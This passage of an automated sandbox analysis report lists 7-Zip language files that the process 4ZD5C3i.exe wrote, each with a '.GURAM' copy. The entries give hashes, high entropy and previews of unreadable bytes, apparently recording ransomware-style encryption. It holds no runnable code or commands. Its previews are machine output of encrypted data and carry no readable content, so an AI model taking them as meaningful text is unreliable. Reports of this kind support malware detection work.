                                                                                                                                                                                                                                                Preview:..1....Kh..p.=#...4Di.|X.......d.JN.;.....U{iO.k..`.r1a...,VKlP*Z4.....w:K.!..7vB........Y7.9.U...<.,).L..FdLZ|H..x.o......_.....NjaYq...P..{....;M=w=a... f..1.;..30.I.6.;?KV.p#.b...+......{.kS]....Y.M.........g(E....rJi..-..W}.)l.x.G..4y.d...$..t%!......uU7<..e.r;CE.........ur#..g.......A.....n3..W.G..)....y.4...~.V6...;.O>.7......6..:..i....>a4Ux...c............o..w.u..#...Q.^....Yq.......L......!a..|...W....v..*...s...q^.b..^.&y..(7.Dh.jY....i..p......2\.8.IG3....6....T..G.IYM.z.w6N.X.6M$u...2.9r.KD.W.h.U.......e-..9h.:.....S.}I?.^.....N..Fd-m..+u...lD..%...j.f..H.o|I).=..Z.((...D...v...W$..JF.....j.$.1..]E.0.=....NZ{.=.B.J.........R......q......0i....o|..$.q.J...B....6..7g.-........eq[G.`^..ue.-..{..2.y.I0.....g(4T.n.X..^X...b..C...x..Q-........Vh+P...B.=N..i....1v.....".1..........]?z5"..v.T..i..Jwe#.?.]ld....;MXc.w....B8.=01..|...^..8..L6.Gkp)/...".~!..gf..f.U.A.]...o.....gdJ.....}..3....4.E.e..f.x...e....q...Rz....R/..l.. ^..CI.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ext.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8329
                                                                                                                                                                                                                                                Entropy (8bit):7.978491106310768
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:wJYgKgQzLimTGiVEFpjawnIUXFELEaZoGg+iuvgH9imkvUt:JgdPXfFAwn7SpZoGg+iuTmkst
                                                                                                                                                                                                                                                MD5:DE846F64BB9AE6E5D5C063C4092468B5
                                                                                                                                                                                                                                                SHA1:898F2316924C3E251E9495D782114AAE8A7C43B6
                                                                                                                                                                                                                                                SHA-256:D37D229D16F5677D1E7335A293B66D050AB9E366634B74BD86ABB915AA636953
                                                                                                                                                                                                                                                SHA-512:2A66FAE6EDE6C3EC81B9FB2E61C34421C0A7CCA66E1C1A4E3321BEDB334387F44FA8A58BA5A0FFA4FF1035D4CFCF3C510F183729311F313F2A8F31CD531D1612
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..1....Kh..p.=#...4Di.|X.......d.JN.;.....U{iO.k..`.r1a...,VKlP*Z4.....w:K.!..7vB........Y7.9.U...<.,).L..FdLZ|H..x.o......_.....NjaYq...P..{....;M=w=a... f..1.;..30.I.6.;?KV.p#.b...+......{.kS]....Y.M.........g(E....rJi..-..W}.)l.x.G..4y.d...$..t%!......uU7<..e.r;CE.........ur#..g.......A.....n3..W.G..)....y.4...~.V6...;.O>.7......6..:..i....>a4Ux...c............o..w.u..#...Q.^....Yq.......L......!a..|...W....v..*...s...q^.b..^.&y..(7.Dh.jY....i..p......2\.8.IG3....6....T..G.IYM.z.w6N.X.6M$u...2.9r.KD.W.h.U.......e-..9h.:.....S.}I?.^.....N..Fd-m..+u...lD..%...j.f..H.o|I).=..Z.((...D...v...W$..JF.....j.$.1..]E.0.=....NZ{.=.B.J.........R......q......0i....o|..$.q.J...B....6..7g.-........eq[G.`^..ue.-..{..2.y.I0.....g(4T.n.X..^X...b..C...x..Q-........Vh+P...B.=N..i....1v.....".1..........]?z5"..v.T..i..Jwe#.?.]ld....;MXc.w....B8.=01..|...^..8..L6.Gkp)/...".~!..gf..f.U.A.]...o.....gdJ.....}..3....4.E.e..f.x...e....q...Rz....R/..l.. ^..CI.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fa.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14404
                                                                                                                                                                                                                                                Entropy (8bit):7.986980582518341
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:pifmPfSbPzjjuhEqoG+e2l7Vwe/IFXB2MfTY1BhBlKAJgcCF0RzQI+XSM5YirU+:0eKaGje2ZQFXvMhBlDJrI0RGSMI+
                                                                                                                                                                                                                                                MD5:348EEC1CD8699856FEC39026D73ED9D9
                                                                                                                                                                                                                                                SHA1:1EDF8619EDC30EA006033DBEDC316558CAEF3590
                                                                                                                                                                                                                                                SHA-256:0F2D33CC30892239D21B1D7FCE843912AE58BE55699CCF5856896F8F8CE60EA8
                                                                                                                                                                                                                                                SHA-512:0D8FC01EF17788F710024C948B17F871FF37C48785876831BD1D18048099A9B0EA06BA1011215CB98B5F908FF6867B5F139E10F46EDC95EA24D164E909FF61EF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:\.S.Q(.1...c.>.;...U~................AZ.;...E..4..o....p..x.Z..]......46....;.!ol..}H-.+....L.....:..EcN^..G.........1!E.."G.}2.....,...'.!.{(......ll...c....... .KW.v..l8 ...\.*4O".|....C.?.....J>. R.?P...i.^.JL..if}.|.N..!.V.p.s...`..B..v..!]......<...yY.c...8.Ad............!...s......?3p.........O...+4.b.E.]..2Nf...[.O.. . b..C..m..Ta......X.c....(.C....U....'.['G...w]O............3...L............<6....T..~gB$.w+.....v^.._...0...mb..sad.6.:......yb..V?...%>...5..?..2...t;O....9... VYLX.<.A....{...F.....H..y...M..~U...GabotT..<....|.....>...e.z..k.y^.?)....vG,m...tJG..U.1o$.TC...8.tlb...54w......z.u..w.?......5._..ku.^<!...J...S...iI.....B....P.-b..K...k6.&9v....N..$..T..M3J...l...."..>q.g.B/Z..1..4....)..Dr.....v.s..;YcMK.........Z.;o.Z..o..V.....F.4.._.a..L..P#?.....k.}..qp`.........g..{J@580.lE......V/....2.\...j?.h..... H.........m.Rj..;.....i.X ........+/......D........*........Dc...N`.w....@.Oe2....S.~.>..9DFT9nq.....2.+.,.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fa.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14404
                                                                                                                                                                                                                                                Entropy (8bit):7.986980582518341
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:pifmPfSbPzjjuhEqoG+e2l7Vwe/IFXB2MfTY1BhBlKAJgcCF0RzQI+XSM5YirU+:0eKaGje2ZQFXvMhBlDJrI0RGSMI+
                                                                                                                                                                                                                                                MD5:348EEC1CD8699856FEC39026D73ED9D9
                                                                                                                                                                                                                                                SHA1:1EDF8619EDC30EA006033DBEDC316558CAEF3590
                                                                                                                                                                                                                                                SHA-256:0F2D33CC30892239D21B1D7FCE843912AE58BE55699CCF5856896F8F8CE60EA8
                                                                                                                                                                                                                                                SHA-512:0D8FC01EF17788F710024C948B17F871FF37C48785876831BD1D18048099A9B0EA06BA1011215CB98B5F908FF6867B5F139E10F46EDC95EA24D164E909FF61EF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:\.S.Q(.1...c.>.;...U~................AZ.;...E..4..o....p..x.Z..]......46....;.!ol..}H-.+....L.....:..EcN^..G.........1!E.."G.}2.....,...'.!.{(......ll...c....... .KW.v..l8 ...\.*4O".|....C.?.....J>. R.?P...i.^.JL..if}.|.N..!.V.p.s...`..B..v..!]......<...yY.c...8.Ad............!...s......?3p.........O...+4.b.E.]..2Nf...[.O.. . b..C..m..Ta......X.c....(.C....U....'.['G...w]O............3...L............<6....T..~gB$.w+.....v^.._...0...mb..sad.6.:......yb..V?...%>...5..?..2...t;O....9... VYLX.<.A....{...F.....H..y...M..~U...GabotT..<....|.....>...e.z..k.y^.?)....vG,m...tJG..U.1o$.TC...8.tlb...54w......z.u..w.?......5._..ku.^<!...J...S...iI.....B....P.-b..K...k6.&9v....N..$..T..M3J...l...."..>q.g.B/Z..1..4....)..Dr.....v.s..;YcMK.........Z.;o.Z..o..V.....F.4.._.a..L..P#?.....k.}..qp`.........g..{J@580.lE......V/....2.\...j?.h..... H.........m.Rj..;.....i.X ........+/......D........*........Dc...N`.w....@.Oe2....S.~.>..9DFT9nq.....2.+.,.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fi.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9639
                                                                                                                                                                                                                                                Entropy (8bit):7.980250295473363
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:+cEoF2emotVO4zczCyxv8lVtkYdSxSOzD1uTWGyO5Ft04R75+1fUU1WAZmDZPPiE:3E6muVOMcDmjdSxSOzQHtDFs8U1WAZmr
                                                                                                                                                                                                                                                MD5:F367BEADBA4FD2AF48503CD88812CDF1
                                                                                                                                                                                                                                                SHA1:BEBB0D3C62FB35FAC05C9A9AC2C3BD9C6F262E6D
                                                                                                                                                                                                                                                SHA-256:1E78FF04B88CC698CAB5DA96BCA130887811F01CCE51A6512425D63572DD36E1
                                                                                                                                                                                                                                                SHA-512:84CC1B0538543D4CCC514F9EDB14F0ECA8A2465550ECD6BE5492AA8E8CF9906F5F451741235999DACFA52572F5A81119A872BAF930F3BDFBE1943B76F4BC1545
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.`.GTj.Z....2....!.%Z#Lf.h.(n..5._....B.`.A.mP...i.V..F...J}..R..{^.d..e.....C..{.v.............Ks....(f...hgQ.J.=bx.d....I..T^. <2....../.N.EY.za`vm.y.[*.+WC"..{...XF...g.....8....#....}...=...\...a2.OS.x6.o/.y'../.Jc..3.. (.<...q.B....G.o....*~c.1...p..(~... %.\ {.Eg...?Fj..N........?.68O......gG.).j4[.;G.:.w=....a~J..c....CSt......^f%g.....).1...C1-..U*[...P.4.....K..a......./gZ...b..6.hqvxEN{..!nP.%....k....6...3|..s...|..cbO.p|u...C:|...3.....p..../..!..].D.F......X.......}*.I....w..J.58t.)...Qu..Qp.N....4.o.u....9...B.3...l..,`..U.7.{.m...M...p{..R...'.[.S.>.i.Q.b.t.EY'.(('..........E..b..m...!..!b..s....\u.:..[86.6..>.ze[..M........(.39[.U.J0jxa.q.o.z...Z3.M..5[].6.1g.7...m.[0db..\..>.p.y...".J.B.(U.......Y=Y..3U.Y..,..o...T>".#z........D.....a.Fm....3..Z..r*..A...x.,.U...:...&S...B.k......".[.1.s...V.c.Y..h$y(f..I.<.....?.`A.....{.>.}.4...i2.s~....P..........q.@.dpB..u ...Y....m}...)U&.y.[..=..r.....^....q...Y..P....2:..Q.......Q.f

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fi.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9639
                                                                                                                                                                                                                                                Entropy (8bit):7.980250295473363
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:+cEoF2emotVO4zczCyxv8lVtkYdSxSOzD1uTWGyO5Ft04R75+1fUU1WAZmDZPPiE:3E6muVOMcDmjdSxSOzQHtDFs8U1WAZmr
                                                                                                                                                                                                                                                MD5:F367BEADBA4FD2AF48503CD88812CDF1
                                                                                                                                                                                                                                                SHA1:BEBB0D3C62FB35FAC05C9A9AC2C3BD9C6F262E6D
                                                                                                                                                                                                                                                SHA-256:1E78FF04B88CC698CAB5DA96BCA130887811F01CCE51A6512425D63572DD36E1
                                                                                                                                                                                                                                                SHA-512:84CC1B0538543D4CCC514F9EDB14F0ECA8A2465550ECD6BE5492AA8E8CF9906F5F451741235999DACFA52572F5A81119A872BAF930F3BDFBE1943B76F4BC1545
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.`.GTj.Z....2....!.%Z#Lf.h.(n..5._....B.`.A.mP...i.V..F...J}..R..{^.d..e.....C..{.v.............Ks....(f...hgQ.J.=bx.d....I..T^. <2....../.N.EY.za`vm.y.[*.+WC"..{...XF...g.....8....#....}...=...\...a2.OS.x6.o/.y'../.Jc..3.. (.<...q.B....G.o....*~c.1...p..(~... %.\ {.Eg...?Fj..N........?.68O......gG.).j4[.;G.:.w=....a~J..c....CSt......^f%g.....).1...C1-..U*[...P.4.....K..a......./gZ...b..6.hqvxEN{..!nP.%....k....6...3|..s...|..cbO.p|u...C:|...3.....p..../..!..].D.F......X.......}*.I....w..J.58t.)...Qu..Qp.N....4.o.u....9...B.3...l..,`..U.7.{.m...M...p{..R...'.[.S.>.i.Q.b.t.EY'.(('..........E..b..m...!..!b..s....\u.:..[86.6..>.ze[..M........(.39[.U.J0jxa.q.o.z...Z3.M..5[].6.1g.7...m.[0db..\..>.p.y...".J.B.(U.......Y=Y..3U.Y..,..o...T>".#z........D.....a.Fm....3..Z..r*..A...x.,.U...:...&S...B.k......".[.1.s...V.c.Y..h$y(f..I.<.....?.`A.....{.>.}.4...i2.s~....P..........q.@.dpB..u ...Y....m}...)U&.y.[..=..r.....^....q...Y..P....2:..Q.......Q.f

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fr.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10518
                                                                                                                                                                                                                                                Entropy (8bit):7.981121729421117
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:amdJ8v4+OwrmSiyLsOT2a9qUYOBZZdUJReKfdkI5uKTBj2WxjBR0dPixdHkUS:rdmA+vrtAbI3de5qsLDdLS
                                                                                                                                                                                                                                                MD5:14F8A9CD9D08162044C365070E47C3C3
                                                                                                                                                                                                                                                SHA1:FF02EE72195A7B1A182F078D56E3B61C108C6F8C
                                                                                                                                                                                                                                                SHA-256:6BEC8B8CB33DB59FEEAD2E8391777C121720C3D2EA3C364A28BE0B7EF684241A
                                                                                                                                                                                                                                                SHA-512:EEF152D19D370A5460295A9400B91448543C08CD8EADBABB6E3AA932C57596A17F7B4BC57A3DA32090650727EDD68323132A39425205D3278423F0899B37B09C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.e:....k...v.4y....R.Qly...|...Q.n..Ew......Ou.q..?../.K....D.w...j.b....\.|...](.).....7w....}`.&<..(.....U*wG..Qm.d...7.......d.._...L.. g6.J5;7.|>E#...A..[....%.w.J....R..*..HZ...!..~.d...P..iXv...fD.wN8.q."..c=...-.s]w...c...u.2;Z[.s.U....$~..#.=..a.....IM.;.....c..&"K....2..R.BM..7.Ao..{...A|..........Q..mq]......B..U...M.@...7.c....U.....e}...y.`...e...<.......O-.....y...s........-<Y.....S..i......m.e...._.]-./..a...M....i&y.,...M.....Z..t%..l.5.*.1.Uem.z#...[VD................L#...K.)..3lH.5...B.....s..+.~....F....0..!..{..G..[.YF.>6.7..=._.r.-y.....C0.T.;....^.m.^?.'.F..1....J.y.7./.i:D0.R.ck.......u3Z......!......,....G....I.D..'..y](.A.t.O...F.k...t4....R.hQ..N....J..<.[...zX......O.'[...\..G..t..(.~h...Pd...i....=.e.|HP?p.&i...B..N>!.H..K..i{h....;. ...p..\x.......*f..O.. ..T.7."yNs.3.!"+..-i....0..I.f=....n..7...]...p.......=..KG?.{|....X.U.,}.\. .}...L......3...t.S.(H.'...X..+.4...B^s.....[.......4.....V..:..p...5p...%.....u..hAvG.-

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fr.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10518
                                                                                                                                                                                                                                                Entropy (8bit):7.981121729421117
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:amdJ8v4+OwrmSiyLsOT2a9qUYOBZZdUJReKfdkI5uKTBj2WxjBR0dPixdHkUS:rdmA+vrtAbI3de5qsLDdLS
                                                                                                                                                                                                                                                MD5:14F8A9CD9D08162044C365070E47C3C3
                                                                                                                                                                                                                                                SHA1:FF02EE72195A7B1A182F078D56E3B61C108C6F8C
                                                                                                                                                                                                                                                SHA-256:6BEC8B8CB33DB59FEEAD2E8391777C121720C3D2EA3C364A28BE0B7EF684241A
                                                                                                                                                                                                                                                SHA-512:EEF152D19D370A5460295A9400B91448543C08CD8EADBABB6E3AA932C57596A17F7B4BC57A3DA32090650727EDD68323132A39425205D3278423F0899B37B09C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.e:....k...v.4y....R.Qly...|...Q.n..Ew......Ou.q..?../.K....D.w...j.b....\.|...](.).....7w....}`.&<..(.....U*wG..Qm.d...7.......d.._...L.. g6.J5;7.|>E#...A..[....%.w.J....R..*..HZ...!..~.d...P..iXv...fD.wN8.q."..c=...-.s]w...c...u.2;Z[.s.U....$~..#.=..a.....IM.;.....c..&"K....2..R.BM..7.Ao..{...A|..........Q..mq]......B..U...M.@...7.c....U.....e}...y.`...e...<.......O-.....y...s........-<Y.....S..i......m.e...._.]-./..a...M....i&y.,...M.....Z..t%..l.5.*.1.Uem.z#...[VD................L#...K.)..3lH.5...B.....s..+.~....F....0..!..{..G..[.YF.>6.7..=._.r.-y.....C0.T.;....^.m.^?.'.F..1....J.y.7./.i:D0.R.ck.......u3Z......!......,....G....I.D..'..y](.A.t.O...F.k...t4....R.hQ..N....J..<.[...zX......O.'[...\..G..t..(.~h...Pd...i....=.e.|HP?p.&i...B..N>!.H..K..i{h....;. ...p..\x.......*f..O.. ..T.7."yNs.3.!"+..-i....0..I.f=....n..7...]...p.......=..KG?.{|....X.U.,}.\. .}...L......3...t.S.(H.'...X..+.4...B^s.....[.......4.....V..:..p...5p...%.....u..hAvG.-

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fur.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8125
                                                                                                                                                                                                                                                Entropy (8bit):7.975675359131537
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:RhjzUdw7bQ2Hw37ndBu8ch275itnifEhne1f3ghLGIRp2icUq:Rhk2YPvuofwh1pZzq
                                                                                                                                                                                                                                                MD5:263A94CE9A91BF0D204C9137406F218A
                                                                                                                                                                                                                                                SHA1:D2B900D753703D2FF59405F5F39E90B661ABF925
                                                                                                                                                                                                                                                SHA-256:F663012A7ACF69BE5AD3DDC4D3812C6E49EA74728397E4E2FB745766CDB8BD4E
                                                                                                                                                                                                                                                SHA-512:C5AF25A99722271DA17D237D97F4C8FF6AFA546D2CC423B288DE9D644B198B33D081DB5D2F224EBEFCF2442A0C9C02D11FF67EA75F39DD36E62697D9CB9E293D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.k.:....-...X.]....9L.v..~.KU6.G3.V+.......C......f..).-.C..2..'.c...`.....m..|Sf..m..P..y.u..;......o...........D..vhV..Ac..d>.+x.....8.[&..K.,al.7.%........>...S@...G...v!..4l.:............A..v.4pCVJA.{.`.3.....V..0.I..S;._.....R..4.....T...9l....C.....A...s..x.= <.{3..._dYE....&.g..ge.e.....b.w<[8l.@.C[..r]...(e..a.%..FN|.*!D.'L.........t.y.....W...]NE....3DV.....^.......:0l...f.{....*........M...d.o..gD..^..hsX......Pg...b..;b......`.f.p._..S.A..R...wa...E.G.;p.xu.g....v.*.....nPFr.!.....CE.h....*.3...&}....|m..m.....o.w>.Y.t......x.A'9....73....A...y.P..{...-....#...@/......*_kR....UHo.8..b..3.&...d."...=@.a.~v.~.H..g...W]..W....h.x.Et*.<..j].>......P....l..... .\.E.S/...E..L....0=.<=....M...A.....^H...V.. *..vAy.0{\..=..+...y*..|..UU......UVZ.[.Y......?.......D.^.R.V<1.%.Z....qX.qq..=..{..Ja.W.....s.&.q..$+.-...2S....j....sE...n...X...x>..e.r.Br<B..:O.}b.Q.........i......0.....r..4K......5d...$..AD.J.31va.X.s. .~F..;..}..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fur.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8125
                                                                                                                                                                                                                                                Entropy (8bit):7.975675359131537
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:RhjzUdw7bQ2Hw37ndBu8ch275itnifEhne1f3ghLGIRp2icUq:Rhk2YPvuofwh1pZzq
                                                                                                                                                                                                                                                MD5:263A94CE9A91BF0D204C9137406F218A
                                                                                                                                                                                                                                                SHA1:D2B900D753703D2FF59405F5F39E90B661ABF925
                                                                                                                                                                                                                                                SHA-256:F663012A7ACF69BE5AD3DDC4D3812C6E49EA74728397E4E2FB745766CDB8BD4E
                                                                                                                                                                                                                                                SHA-512:C5AF25A99722271DA17D237D97F4C8FF6AFA546D2CC423B288DE9D644B198B33D081DB5D2F224EBEFCF2442A0C9C02D11FF67EA75F39DD36E62697D9CB9E293D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.k.:....-...X.]....9L.v..~.KU6.G3.V+.......C......f..).-.C..2..'.c...`.....m..|Sf..m..P..y.u..;......o...........D..vhV..Ac..d>.+x.....8.[&..K.,al.7.%........>...S@...G...v!..4l.:............A..v.4pCVJA.{.`.3.....V..0.I..S;._.....R..4.....T...9l....C.....A...s..x.= <.{3..._dYE....&.g..ge.e.....b.w<[8l.@.C[..r]...(e..a.%..FN|.*!D.'L.........t.y.....W...]NE....3DV.....^.......:0l...f.{....*........M...d.o..gD..^..hsX......Pg...b..;b......`.f.p._..S.A..R...wa...E.G.;p.xu.g....v.*.....nPFr.!.....CE.h....*.3...&}....|m..m.....o.w>.Y.t......x.A'9....73....A...y.P..{...-....#...@/......*_kR....UHo.8..b..3.&...d."...=@.a.~v.~.H..g...W]..W....h.x.Et*.<..j].>......P....l..... .\.E.S/...E..L....0=.<=....M...A.....^H...V.. *..vAy.0{\..=..+...y*..|..UU......UVZ.[.Y......?.......D.^.R.V<1.%.Z....qX.qq..=..{..Ja.W.....s.&.q..$+.-...2S....j....sE...n...X...x>..e.r.Br<B..:O.}b.Q.........i......0.....r..4K......5d...$..AD.J.31va.X.s. .~F..;..}..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fy.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7041
                                                                                                                                                                                                                                                Entropy (8bit):7.971281356640175
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:EZg4z1ZVlHx1J8rUimbrNKQqfnwbvzU5UR:E17RVyWbryncBR
                                                                                                                                                                                                                                                MD5:888D41D2F968A2CE3DCA835E190C9166
                                                                                                                                                                                                                                                SHA1:A914904E4F790AEE04811EC206896B61874623BD
                                                                                                                                                                                                                                                SHA-256:F2BFBA97C0106A253AC169DF3E77C2A74A3AF445ABBEF56B989B65519AE1C40E
                                                                                                                                                                                                                                                SHA-512:155C638B771AA1D22E7E750C9A6FA694882BC6C637AECC0BE3C097B8063A9CDCF413770AE26FFF8CF2C4E6ADD706B0EDFE5D66EABE809FAEEC3F80C952826DCF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:K,..E..M.Lu@.7.O@.v4..>$.........Nd..."..#[..0f......8.......D..[.EE.4...*.......U..;.cc.B.{+w........P.H....*..d....'aE.vxz}.=.\.v.\.m]...Z.......*..;...y...%.7..-.WO.W.C.0.fEZ..........3w.....=.|0A.......s)eSR...;........5u,.V.c..".x~.6.."...q..hK..cz.......R.s.P6......N?PS...$..|!u*Cj/..}...p.k...^b*g..1%.6 Z....tb....?x..C..P....f.K.8J.L.=.g......6.....&......Yi.3..J8...].).....o=}.a....y...uS...l..,<(.a.B'.........M.jo...o...5O...'.?....1.I.+Zq{[..`@....77YM(..+..3Ze..r.O..~.|...$t{.HkRL1...hi..K.......E....V.7;S..'.w\..&W......"..oU...Q....:g..o..]b.p.U......~.8uA2*.......3.4.c'..Se^H..ekM{....#EH.@_.....F.K.d.`.0....\......c.^=Il.3.0.7X2.5........'C$.y.<....@h0T.Dn....P.DpZ^.".x.iD.^.|.m..x.Lh...E..sc.SI.dz..rA.W@F.K.e.......S.;....c....k..!..'n...M.o.\.$v.cG...!.~ "N.. .P.{..Gf..ng!.Z..K..=K.....~cv.1..kX......#....d.[D).x.. ..j.&c/...y....t@...y......B..@.......:.S%<.YCx.).3A......u"..#..<.h..\l.K.$.c...Z...0w.t.<H..'.......?..u.XX-E...5

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\fy.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7041
                                                                                                                                                                                                                                                Entropy (8bit):7.971281356640175
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:EZg4z1ZVlHx1J8rUimbrNKQqfnwbvzU5UR:E17RVyWbryncBR
                                                                                                                                                                                                                                                MD5:888D41D2F968A2CE3DCA835E190C9166
                                                                                                                                                                                                                                                SHA1:A914904E4F790AEE04811EC206896B61874623BD
                                                                                                                                                                                                                                                SHA-256:F2BFBA97C0106A253AC169DF3E77C2A74A3AF445ABBEF56B989B65519AE1C40E
                                                                                                                                                                                                                                                SHA-512:155C638B771AA1D22E7E750C9A6FA694882BC6C637AECC0BE3C097B8063A9CDCF413770AE26FFF8CF2C4E6ADD706B0EDFE5D66EABE809FAEEC3F80C952826DCF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:K,..E..M.Lu@.7.O@.v4..>$.........Nd..."..#[..0f......8.......D..[.EE.4...*.......U..;.cc.B.{+w........P.H....*..d....'aE.vxz}.=.\.v.\.m]...Z.......*..;...y...%.7..-.WO.W.C.0.fEZ..........3w.....=.|0A.......s)eSR...;........5u,.V.c..".x~.6.."...q..hK..cz.......R.s.P6......N?PS...$..|!u*Cj/..}...p.k...^b*g..1%.6 Z....tb....?x..C..P....f.K.8J.L.=.g......6.....&......Yi.3..J8...].).....o=}.a....y...uS...l..,<(.a.B'.........M.jo...o...5O...'.?....1.I.+Zq{[..`@....77YM(..+..3Ze..r.O..~.|...$t{.HkRL1...hi..K.......E....V.7;S..'.w\..&W......"..oU...Q....:g..o..]b.p.U......~.8uA2*.......3.4.c'..Se^H..ekM{....#EH.@_.....F.K.d.`.0....\......c.^=Il.3.0.7X2.5........'C$.y.<....@h0T.Dn....P.DpZ^.".x.iD.^.|.m..x.Lh...E..sc.SI.dz..rA.W@F.K.e.......S.;....c....k..!..'n...M.o.\.$v.cG...!.~ "N.. .P.{..Gf..ng!.Z..K..=K.....~cv.1..kX......#....d.[D).x.. ..j.&c/...y....t@...y......B..@.......:.S%<.YCx.).3A......u"..#..<.h..\l.K.$.c...Z...0w.t.<H..'.......?..u.XX-E...5

